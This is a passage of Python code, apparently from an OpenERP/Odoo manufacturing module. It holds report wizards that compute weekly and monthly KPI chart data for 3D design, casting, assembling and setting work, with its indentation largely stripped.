self.pool.get('hp.kpis.view.chart.3d.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'3', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.3d.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'4', 'point': 0, 'quantity': 0})
                    # work out the date range of each week
if i == 1:
date_from = date_to
date_to = date_from + relativedelta(days=6)
else:
date_from = date_to + relativedelta(days=1)
if i == 4:
date_to = obj.month.date_stop
elif i !=1 :
date_to = date_from + relativedelta(days=7)
#get report 3d line
if(not obj.employee_id):
_3d_report_ids = self.pool.get('hpusa.3d.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.state','=','confirmed')])
else:
_3d_report_ids = self.pool.get('hpusa.3d.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.designer_id','=',obj.employee_id.id),('parent_id.state','=','confirmed')])
for _3d_report_id in _3d_report_ids:
_3d_report = self.pool.get('hpusa.3d.report.line').browse(cr, uid, _3d_report_id)
if _3d_report.product_id._3d_design_times:
times = _3d_report.product_id._3d_design_times.name
if times > 3:
self.pool.get('hp.kpis.view.chart.3d.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'4', 'point': _3d_report.point, 'quantity': 1 * _3d_report.complete})
else:
self.pool.get('hp.kpis.view.chart.3d.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type': str(times), 'point': _3d_report.point, 'quantity': 1 * _3d_report.complete})
else:
month_ids = self.pool.get('account.period').search(cr, uid, [('date_start','>=',obj.month_from.date_start),('date_stop','<=',obj.month_to.date_stop)])
for i in month_ids:
# month
month = self.pool.get('account.period').browse(cr, uid, i, context)
if month.date_start != month.date_stop:
self.pool.get('hp.kpis.view.chart.3d.productivity').create(cr, uid, {'name': month.name, 'type':'1', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.3d.productivity').create(cr, uid, {'name': month.name, 'type':'2', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.3d.productivity').create(cr, uid, {'name': month.name, 'type':'3', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.3d.productivity').create(cr, uid, {'name': month.name, 'type':'4', 'point': 0, 'quantity': 0})
#get report 3d line
_3d_report_ids = self.pool.get('hpusa.3d.report.line').search(cr, uid, [('parent_id.report_date','>=',month.date_start),('parent_id.report_date','<=',month.date_stop),('parent_id.state','=','confirmed')])
for _3d_report_id in _3d_report_ids:
_3d_report = self.pool.get('hpusa.3d.report.line').browse(cr, uid, _3d_report_id)
if _3d_report.product_id._3d_design_times:
times = _3d_report.product_id._3d_design_times.name
if times > 3:
self.pool.get('hp.kpis.view.chart.3d.productivity').create(cr, uid, {'name': month.name, 'type':'4', 'point': _3d_report.point, 'quantity': 1 * _3d_report.complete})
else:
self.pool.get('hp.kpis.view.chart.3d.productivity').create(cr, uid, {'name': month.name, 'type': str(times), 'point': _3d_report.point, 'quantity': 1 * _3d_report.complete})
res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', 'action_hp_kpis_view_chart_3d_productivity_graph')
elif obj.type_report == 'compare':
_3d_ids = self.pool.get('hp.kpis.view.chart.3d.compare').search(cr, uid, [])
if(_3d_ids):
self.pool.get('hp.kpis.view.chart.3d.compare').unlink(cr, uid, _3d_ids)
if obj.option == 'month':
date_to = datetime.strptime(obj.month.date_start, '%Y-%m-%d')
for i in range(1, 5):
                    # work out the date range of each week
if i == 1:
date_from = date_to
date_to = date_from + relativedelta(days=6)
else:
date_from = date_to + relativedelta(days=1)
if i == 4:
date_to = obj.month.date_stop
elif i !=1 :
date_to = date_from + relativedelta(days=7)
#get report 3d line
_3d_report_ids = self.pool.get('hpusa.3d.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.state','=','confirmed')])
for _3d_report_id in _3d_report_ids:
_3d_report = self.pool.get('hpusa.3d.report.line').browse(cr, uid, _3d_report_id)
self.pool.get('hp.kpis.view.chart.3d.compare').create(cr, uid, {'name': 'Week '+str(i),'employee_id':_3d_report.parent_id.designer_id.id,'point': _3d_report.point, 'quantity': 1 * _3d_report.complete})
else:
#get month list
month_ids = self.pool.get('account.period').search(cr, uid, [('date_start','>=',obj.month_from.date_start),('date_stop','<=',obj.month_to.date_stop)])
for i in month_ids:
# month
month = self.pool.get('account.period').browse(cr, uid, i, context)
if month.date_start != month.date_stop:
#get report 3d line
_3d_report_ids = self.pool.get('hpusa.3d.report.line').search(cr, uid, [('parent_id.report_date','>=',month.date_start),('parent_id.report_date','<=',month.date_stop),('parent_id.state','=','confirmed')])
for _3d_report_id in _3d_report_ids:
_3d_report = self.pool.get('hpusa.3d.report.line').browse(cr, uid, _3d_report_id)
self.pool.get('hp.kpis.view.chart.3d.compare').create(cr, uid, {'name': month.name,'employee_id':_3d_report.parent_id.designer_id.id,'point': _3d_report.point, 'quantity': 1 * _3d_report.complete})
#open action
res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', 'action_hp_kpis_view_chart_3d_compare_graph')
id = res and res[1] or False
result = act_obj.read(cr, uid, [id], context=context)[0]
result['target'] = 'current'
return result
wizard_hp_report_chart_kpis_3d()
class wizard_hp_report_chart_kpis_casting(osv.osv_memory):
_name = "wizard.hp.report.chart.kpis.casting"
_table = "wizard_hp_report_chart_kpis"
_inherit = "wizard.hp.report.chart.kpis"
def action_view_chart(self, cr, uid, ids, context):
obj = self.browse(cr, uid, ids[0], context)
#open action
mod_obj = self.pool.get('ir.model.data')
act_obj = self.pool.get('ir.actions.act_window')
if obj.type_report == 'synthetic':
_casting_ids = self.pool.get('hp.kpis.view.chart.casting').search(cr, uid, [])
if(_casting_ids):
self.pool.get('hp.kpis.view.chart.casting').unlink(cr, uid, _casting_ids)
if(obj.option == 'month'):
date_to = datetime.strptime(obj.month.date_start, '%Y-%m-%d')
for i in range(1, 5):
                    # work out the date range of each week
if(i == 1):
date_from = date_to
else:
date_from = date_to + relativedelta(days=1)
date_to = date_from + relativedelta(days=6)
print date_from, date_to
#get report 3d line
_casting_report_ids = self.pool.get('hpusa.casting.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.state','=','confirmed')])
point = 0
qty = 0
for _casting_report_id in _casting_report_ids:
line = self.pool.get('hpusa.casting.report.line').browse(cr, uid, _casting_report_id)
point += line.point
qty += line.complete
self.pool.get('hp.kpis.view.chart.casting').create(cr, uid, {'name': 'Week '+str(i),'point': point, 'quantity': qty})
else:
#get month list
month_ids = self.pool.get('account.period').search(cr, uid, [('date_start','>=',obj.month_from.date_start),('date_stop','<=',obj.month_to.date_stop)])
for i in month_ids:
# month
month = self.pool.get('account.period').browse(cr, uid, i, context)
if month.date_start != month.date_stop:
#get report 3d line
_casting_report_ids = self.pool.get('hpusa.casting.report.line').search(cr, uid, [('parent_id.report_date','>=',month.date_start),('parent_id.report_date','<=',month.date_stop),('parent_id.state','=','confirmed')])
point = 0
qty = 0
for _casting_report_id in _casting_report_ids:
line = self.pool.get('hpusa.casting.report.line').browse(cr, uid, _casting_report_id)
point += line.point
qty += line.complete
self.pool.get('hp.kpis.view.chart.casting').create(cr, uid, {'name': month.name,'point': point, 'quantity': qty})
res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', 'action_hp_kpis_view_chart_casting_graph')
elif obj.type_report == 'productivity' or obj.type_report == 'productivity_worker':
_casting_ids = self.pool.get('hp.kpis.view.chart.casting.productivity').search(cr, uid, [])
if(_casting_ids):
self.pool.get('hp.kpis.view.chart.casting.productivity').unlink(cr, uid, _casting_ids)
if obj.option == 'month':
date_to = datetime.strptime(obj.month.date_start, '%Y-%m-%d')
for i in range(1, 5):
                    # initialise the chart columns for each week
self.pool.get('hp.kpis.view.chart.casting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'1', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.casting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'2', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.casting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'3', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.casting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'4', 'point': 0, 'quantity': 0})
                    # work out the date range of each week
if i == 1:
date_from = date_to
date_to = date_from + relativedelta(days=6)
else:
date_from = date_to + relativedelta(days=1)
if i == 4:
date_to = obj.month.date_stop
elif i !=1 :
date_to = date_from + relativedelta(days=7)
#get report 3d line
if(not obj.employee_id):
_casting_report_ids = self.pool.get('hpusa.casting.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.state','=','confirmed')])
else:
_casting_report_ids = self.pool.get('hpusa.casting.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('worker','=',obj.employee_id.id),('parent_id.state','=','confirmed')])
for _casting_report_id in _casting_report_ids:
_casting_report = self.pool.get('hpusa.casting.report.line').browse(cr, uid, _casting_report_id)
if _casting_report.product_id.casting_times:
times = _casting_report.product_id.casting_times.name
if times > 3:
self.pool.get('hp.kpis.view.chart.casting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'4', 'point': _casting_report.point, 'quantity': 1 * _casting_report.complete})
else:
self.pool.get('hp.kpis.view.chart.casting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type': str(times), 'point': _casting_report.point, 'quantity': 1 * _casting_report.complete})
else:
month_ids = self.pool.get('account.period').search(cr, uid, [('date_start','>=',obj.month_from.date_start),('date_stop','<=',obj.month_to.date_stop)])
for i in month_ids:
# month
month = self.pool.get('account.period').browse(cr, uid, i, context)
if month.date_start != month.date_stop:
self.pool.get('hp.kpis.view.chart.casting.productivity').create(cr, uid, {'name': month.name, 'type':'1', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.casting.productivity').create(cr, uid, {'name': month.name, 'type':'2', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.casting.productivity').create(cr, uid, {'name': month.name, 'type':'3', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.casting.productivity').create(cr, uid, {'name': month.name, 'type':'4', 'point': 0, 'quantity': 0})
#get report 3d line
_casting_report_ids = self.pool.get('hpusa.casting.report.line').search(cr, uid, [('parent_id.report_date','>=',month.date_start),('parent_id.report_date','<=',month.date_stop),('parent_id.state','=','confirmed')])
for _casting_report_id in _casting_report_ids:
_casting_report = self.pool.get('hpusa.casting.report.line').browse(cr, uid, _casting_report_id)
                            if _casting_report.product_id.casting_times:
                                times = _casting_report.product_id.casting_times.name
if times > 3:
self.pool.get('hp.kpis.view.chart.casting.productivity').create(cr, uid, {'name': month.name, 'type':'4', 'point': _casting_report.point, 'quantity': 1 * _casting_report.complete})
else:
self.pool.get('hp.kpis.view.chart.casting.productivity').create(cr, uid, {'name': month.name, 'type': str(times), 'point': _casting_report.point, 'quantity': 1 * _casting_report.complete})
res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', 'action_hp_kpis_view_chart_casting_productivity_graph')
elif obj.type_report == 'compare':
_casting_ids = self.pool.get('hp.kpis.view.chart.casting.compare').search(cr, uid, [])
if(_casting_ids):
self.pool.get('hp.kpis.view.chart.casting.compare').unlink(cr, uid, _casting_ids)
if obj.option == 'month':
date_to = datetime.strptime(obj.month.date_start, '%Y-%m-%d')
for i in range(1, 5):
                    # work out the date range of each week
if i == 1:
date_from = date_to
date_to = date_from + relativedelta(days=6)
else:
date_from = date_to + relativedelta(days=1)
if i == 4:
date_to = obj.month.date_stop
elif i !=1 :
date_to = date_from + relativedelta(days=7)
#get report 3d line
_casting_report_ids = self.pool.get('hpusa.casting.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.state','=','confirmed')])
for _casting_report_id in _casting_report_ids:
_casting_report = self.pool.get('hpusa.casting.report.line').browse(cr, uid, _casting_report_id)
self.pool.get('hp.kpis.view.chart.casting.compare').create(cr, uid, {'name': 'Week '+str(i),'employee_id':_casting_report.worker.id,'point': _casting_report.point, 'quantity': 1 * _casting_report.complete})
else:
#get month list
month_ids = self.pool.get('account.period').search(cr, uid, [('date_start','>=',obj.month_from.date_start),('date_stop','<=',obj.month_to.date_stop)])
for i in month_ids:
# month
month = self.pool.get('account.period').browse(cr, uid, i, context)
if month.date_start != month.date_stop:
#get report 3d line
_casting_report_ids = self.pool.get('hpusa.casting.report.line').search(cr, uid, [('parent_id.report_date','>=',month.date_start),('parent_id.report_date','<=',month.date_stop),('parent_id.state','=','confirmed')])
for _casting_report_id in _casting_report_ids:
_casting_report = self.pool.get('hpusa.casting.report.line').browse(cr, uid, _casting_report_id)
self.pool.get('hp.kpis.view.chart.casting.compare').create(cr, uid, {'name': month.name,'employee_id':_casting_report.worker.id,'point': _casting_report.point, 'quantity': 1 * _casting_report.complete})
#open action
res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', 'action_hp_kpis_view_chart_casting_compare_graph')
id = res and res[1] or False
result = act_obj.read(cr, uid, [id], context=context)[0]
result['target'] = 'current'
return result
wizard_hp_report_chart_kpis_casting()
class wizard_hp_report_chart_kpis_assembling(osv.osv_memory):
_name = "wizard.hp.report.chart.kpis.assembling"
_table = "wizard_hp_report_chart_kpis"
_inherit = "wizard.hp.report.chart.kpis"
def action_view_chart(self, cr, uid, ids, context):
obj = self.browse(cr, uid, ids[0], context)
mod_obj = self.pool.get('ir.model.data')
act_obj = self.pool.get('ir.actions.act_window')
if(obj.type_report == 'synthetic'):
_assembling_ids = self.pool.get('hp.kpis.view.chart.assembling').search(cr, uid, [])
if(_assembling_ids):
self.pool.get('hp.kpis.view.chart.assembling').unlink(cr, uid, _assembling_ids)
if(obj.option == 'month'):
date_to = datetime.strptime(obj.month.date_start, '%Y-%m-%d')
for i in range(1, 5):
                    # work out the date range of each week
if i == 1:
date_from = date_to
date_to = date_from + relativedelta(days=6)
else:
date_from = date_to + relativedelta(days=1)
if i == 4:
date_to = obj.month.date_stop
elif i !=1 :
date_to = date_from + relativedelta(days=7)
#get report 3d line
_assembling_report_ids = self.pool.get('hpusa.assembling.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.state','=','confirmed')])
point = 0
qty = 0
for _assembling_report_id in _assembling_report_ids:
line = self.pool.get('hpusa.assembling.report.line').browse(cr, uid, _assembling_report_id)
point += line.point
qty += 1 * line.complete
self.pool.get('hp.kpis.view.chart.assembling').create(cr, uid, {'name': 'Week '+str(i),'point': point, 'quantity': qty})
else:
#get month list
month_ids = self.pool.get('account.period').search(cr, uid, [('date_start','>=',obj.month_from.date_start),('date_stop','<=',obj.month_to.date_stop)])
for i in month_ids:
# month
month = self.pool.get('account.period').browse(cr, uid, i, context)
if month.date_start != month.date_stop:
#get report 3d line
_assembling_report_ids = self.pool.get('hpusa.assembling.report.line').search(cr, uid, [('parent_id.report_date','>=',month.date_start),('parent_id.report_date','<=',month.date_stop),('parent_id.state','=','confirmed')])
point = 0
qty = 0
for _assembling_report_id in _assembling_report_ids:
line = self.pool.get('hpusa.assembling.report.line').browse(cr, uid, _assembling_report_id)
point += line.point
qty += 1 * line.complete
self.pool.get('hp.kpis.view.chart.assembling').create(cr, uid, {'name': month.name,'point': point, 'quantity': qty})
#open action
res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', 'action_hp_kpis_view_chart_assembling_graph')
elif obj.type_report == 'productivity' or obj.type_report == 'productivity_worker':
_assembling_ids = self.pool.get('hp.kpis.view.chart.assembling.productivity').search(cr, uid, [])
if(_assembling_ids):
self.pool.get('hp.kpis.view.chart.assembling.productivity').unlink(cr, uid, _assembling_ids)
if obj.option == 'month':
date_to = datetime.strptime(obj.month.date_start, '%Y-%m-%d')
for i in range(1, 5):
                    # initialise the chart columns for each week
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'1', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'2', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'3', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'4', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'5', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'6', 'point': 0, 'quantity': 0})
                    # work out the date range of each week
if i == 1:
date_from = date_to
date_to = date_from + relativedelta(days=6)
else:
date_from = date_to + relativedelta(days=1)
if i == 4:
date_to = obj.month.date_stop
elif i !=1 :
date_to = date_from + relativedelta(days=7)
#get report 3d line
if(not obj.employee_id):
_assembling_report_ids = self.pool.get('hpusa.assembling.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.state','=','confirmed')])
else:
_assembling_report_ids = self.pool.get('hpusa.assembling.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('worker','=',obj.employee_id.id),('parent_id.state','=','confirmed')])
for _assembling_report_id in _assembling_report_ids:
_assembling_report = self.pool.get('hpusa.assembling.report.line').browse(cr, uid, _assembling_report_id)
if _assembling_report.product_id.ass_difficulty_level:
level = _assembling_report.product_id.ass_difficulty_level.name
if level == 'I':
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'1', 'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
elif level == 'II':
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'2', 'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
elif level == 'III':
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'3', 'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
elif level == 'IV':
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'4', 'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
elif level == 'V':
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'5', 'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
elif level == 'VI':
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'6', 'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
else:
month_ids = self.pool.get('account.period').search(cr, uid, [('date_start','>=',obj.month_from.date_start),('date_stop','<=',obj.month_to.date_stop)])
for i in month_ids:
# month
month = self.pool.get('account.period').browse(cr, uid, i, context)
if month.date_start != month.date_stop:
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': month.name, 'type':'1', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': month.name, 'type':'2', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': month.name, 'type':'3', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': month.name, 'type':'4', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': month.name, 'type':'5', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': month.name, 'type':'6', 'point': 0, 'quantity': 0})
#get report 3d line
_assembling_report_ids = self.pool.get('hpusa.assembling.report.line').search(cr, uid, [('parent_id.report_date','>=',month.date_start),('parent_id.report_date','<=',month.date_stop),('parent_id.state','=','confirmed')])
for _assembling_report_id in _assembling_report_ids:
                            _assembling_report = self.pool.get('hpusa.assembling.report.line').browse(cr, uid, _assembling_report_id)
if _assembling_report.product_id.ass_difficulty_level:
level = _assembling_report.product_id.ass_difficulty_level.name
if level == 'I':
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': month.name, 'type':'1', 'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
elif level == 'II':
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': month.name, 'type':'2', 'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
elif level == 'III':
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': month.name, 'type':'3', 'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
elif level == 'IV':
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': month.name, 'type':'4', 'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
elif level == 'V':
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': month.name, 'type':'5', 'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
elif level == 'VI':
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': month.name, 'type':'6', 'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', 'action_hp_kpis_view_chart_assembling_productivity_graph')
elif obj.type_report == 'compare':
_assembling_ids = self.pool.get('hp.kpis.view.chart.assembling.compare').search(cr, uid, [])
if(_assembling_ids):
self.pool.get('hp.kpis.view.chart.assembling.compare').unlink(cr, uid, _assembling_ids)
if obj.option == 'month':
date_to = datetime.strptime(obj.month.date_start, '%Y-%m-%d')
for i in range(1, 5):
                    # work out the date range of each week
if i == 1:
date_from = date_to
date_to = date_from + relativedelta(days=6)
else:
date_from = date_to + relativedelta(days=1)
if i == 4:
date_to = obj.month.date_stop
elif i !=1 :
date_to = date_from + relativedelta(days=7)
#get report 3d line
_assembling_report_ids = self.pool.get('hpusa.assembling.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.state','=','confirmed')])
for _assembling_report_id in _assembling_report_ids:
_assembling_report = self.pool.get('hpusa.assembling.report.line').browse(cr, uid, _assembling_report_id)
self.pool.get('hp.kpis.view.chart.assembling.compare').create(cr, uid, {'name': 'Week '+str(i),'employee_id':_assembling_report.worker.id,'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
else:
#get month list
month_ids = self.pool.get('account.period').search(cr, uid, [('date_start','>=',obj.month_from.date_start),('date_stop','<=',obj.month_to.date_stop)])
for i in month_ids:
# month
month = self.pool.get('account.period').browse(cr, uid, i, context)
if month.date_start != month.date_stop:
#get report 3d line
_assembling_report_ids = self.pool.get('hpusa.assembling.report.line').search(cr, uid, [('parent_id.report_date','>=',month.date_start),('parent_id.report_date','<=',month.date_stop),('parent_id.state','=','confirmed')])
for _assembling_report_id in _assembling_report_ids:
_assembling_report = self.pool.get('hpusa.assembling.report.line').browse(cr, uid, _assembling_report_id)
self.pool.get('hp.kpis.view.chart.assembling.compare').create(cr, uid, {'name': month.name,'employee_id':_assembling_report.worker.id,'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
#open action
res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', 'action_hp_kpis_view_chart_assembling_compare_graph')
id = res and res[1] or False
result = act_obj.read(cr, uid, [id], context=context)[0]
result['target'] = 'current'
return result
wizard_hp_report_chart_kpis_assembling()
class wizard_hp_report_chart_kpis_setting(osv.osv_memory):
_name = "wizard.hp.report.chart.kpis.setting"
_table = "wizard_hp_report_chart_kpis"
_inherit = "wizard.hp.report.chart.kpis"
def action_view_chart(self, cr, uid, ids, context):
obj = self.browse(cr, uid, ids[0], context)
mod_obj = self.pool.get('ir.model.data')
act_obj = self.pool.get('ir.actions.act_window')
if(obj.type_report == 'synthetic'):
_setting_ids = self.pool.get('hp.kpis.view.chart.setting').search(cr, uid, [])
if(_setting_ids):
self.pool.get('hp.kpis.view.chart.setting').unlink(cr, uid, _setting_ids)
if(obj.option == 'month'):
date_to = datetime.strptime(obj.month.date_start, '%Y-%m-%d')
for i in range(1, 5):
                    # work out the date range of each week
if i == 1:
date_from = date_to
date_to = date_from + relativedelta(days=6)
else:
date_from = date_to + relativedelta(days=1)
if i == 4:
date_to = obj.month.date_stop
elif i !=1 :
date_to = date_from + relativedelta(days=7)
#get report 3d line
_setting_report_ids = self.pool.get('hpusa.setting.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.state','=','confirmed')])
point = 0
qty = 0
for _setting_report_id in _setting_report_ids:
line = self.pool.get('hpusa.setting.report.line').browse(cr, uid, _setting_report_id)
point += line.point
qty += 1 * line.complete
self.pool.get('hp.kpis.view.chart.setting').create(cr, uid, {'name': 'Week '+str(i),'point': point, 'quantity': qty})
else:
#get month list
month_ids = self.pool.get('account.period').search(cr, uid, [('date_start','>=',obj.month_from.date_start),('date_stop','<=',obj.month_to.date_stop)])
for i in month_ids:
# month
month = self.pool.get('account.period').browse(cr, uid, i, context)
if month.date_start != month.date_stop:
#get report 3d line
_setting_report_ids = self.pool.get('hpusa.setting.report.line').search(cr, uid, [('parent_id.report_date','>=',month.date_start),('parent_id.report_date','<=',month.date_stop),('parent_id.state','=','confirmed')])
point = 0
qty = 0
for _setting_report_id in _setting_report_ids:
line = self.pool.get('hpusa.setting.report.line').browse(cr, uid, _setting_report_id)
point += line.point
qty += 1 * line.complete
self.pool.get('hp.kpis.view.chart.setting').create(cr, uid, {'name': month.name,'point': point, 'quantity': qty})
res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', 'action_hp_kpis_view_chart_setting_graph')
elif obj.type_report == 'productivity' or obj.type_report == 'productivity_worker':
_setting_ids = self.pool.get('hp.kpis.view.chart.setting.productivity').search(cr, uid, [])
if(_setting_ids):
self.pool.get('hp.kpis.view.chart.setting.productivity').unlink(cr, uid, _setting_ids)
if obj.option == 'month':
date_to = datetime.strptime(obj.month.date_start, '%Y-%m-%d')
for i in range(1, 5):
                    # initialise the chart columns for each week
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'1', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'2', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'3', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'4', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'5', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'6', 'point': 0, 'quantity': 0})
                    # work out the date range of each week
if i == 1:
date_from = date_to
date_to = date_from + relativedelta(days=6)
else:
date_from = date_to + relativedelta(days=1)
if i == 4:
date_to = obj.month.date_stop
elif i !=1 :
date_to = date_from + relativedelta(days=7)
#get report 3d line
if(not obj.employee_id):
_setting_report_ids = self.pool.get('hpusa.setting.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.state','=','confirmed')])
else:
_setting_report_ids = self.pool.get('hpusa.setting.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('worker','=',obj.employee_id.id),('parent_id.state','=','confirmed')])
for _setting_report_id in _setting_report_ids:
_setting_report = self.pool.get('hpusa.setting.report.line').browse(cr, uid, _setting_report_id)
if _setting_report.product_id.setting_difficulty_level:
level = _setting_report.product_id.setting_difficulty_level.name
if level == 'I':
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'1', 'point': _setting_report.point, 'quantity': 1 * _setting_report.complete})
elif level == 'II':
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'2', 'point': _setting_report.point, 'quantity': 1 * _setting_report.complete})
elif level == 'III':
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'3', 'point': _setting_report.point, 'quantity': 1 * _setting_report.complete})
elif level == 'IV':
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'4', 'point': _setting_report.point, 'quantity': 1 * _setting_report.complete})
elif level == 'V':
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'5', 'point': _setting_report.point, 'quantity': 1 * _setting_report.complete})
elif level == 'VI':
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'6', 'point': _setting_report.point, 'quantity': 1 * _setting_report.complete})
else:
month_ids = self.pool.get('account.period').search(cr, uid, [('date_start','>=',obj.month_from.date_start),('date_stop','<=',obj.month_to.date_stop)])
for i in month_ids:
# month
month = self.pool.get('account.period').browse(cr, uid, i, context)
if month.date_start != month.date_stop:
